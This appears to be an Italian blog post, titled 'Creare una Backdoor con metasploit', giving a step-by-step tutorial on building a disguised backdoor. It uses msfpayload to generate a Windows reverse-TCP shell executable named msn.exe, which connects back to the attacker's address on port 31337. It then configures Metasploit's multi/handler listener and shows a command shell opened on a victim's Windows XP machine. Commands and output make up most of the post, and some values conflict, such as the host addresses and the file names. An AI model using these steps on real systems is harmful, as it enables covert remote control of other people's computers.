Creare una Backdoor con metasploit

È possibile usare, da riga di comando, il tool msfpayload per generare payloads da utilizzarsi in molti contesti ed offre una gran varietà di opzioni di output, come ad esempio uno specifico formato eseguibile.

Possiamo ad esempio generare un eseguibile Windows di tipo reverse shell che si riconnetta a noi sulla porta 31337 (msfpayload opera come msfcli nel senso che si può appendere la lettera “O” al termine della stringa di comando, per vedere quali opzioni siano disponibili).

# cd /opt/metasploit3/msf3
# ./msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
    Version: 7075
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Description:
  Connect back to attacker and spawn a command shell


# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=31337 X >/tmp/msn.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: LHOST=192.168.1.101,LPORT=31337
# file /tmp/mata_hari.exe
/tmp/mata_hari.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
# ls -l /tmp/msn.exe
-rw-r--r-- 1 root root 37888 2010-01-11 12:31 /tmp/msn.exe

Ora che abbiamo ottenuto il nostro eseguibile (e prima che qualcuno lo mandi in esecuzione), dovremo usare il modulo ‘multi/handler’, che serve a gestire gli exploits lanciati esternalmente al framework.

# ./msfconsole
[...]
msf > use exploit/multi/handler
msf exploit(handler) >

Quando si utilizza il modulo “exploit/multi/handler”, occorre ancora specificare quale sia il payload da attendersi e su quale porta attendere, per cui andranno impostate con gli stessi parametri dell’eseguibile precedentemente generato

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp.
msf exploit(handler) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Started reverse handler on port 31337


[*] Starting the payload handler…

vediamo cosa succede nel caso in cui una vittima mandi in esecuzione il file precedentemente generato.

[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.10:31337 -> 192.168.1.253:1049)


Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\Documents and Settings\ago\Documenti\Download>

Il modulo multi/handler ha gestito l’ exploit e ci presenta una shell..

Una Risposta to “Creare una Backdoor con metasploit”

  1. ciao scusa puoi aggiugermi su msn vorrei chiederti di spiegarmi una cosa grazie

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: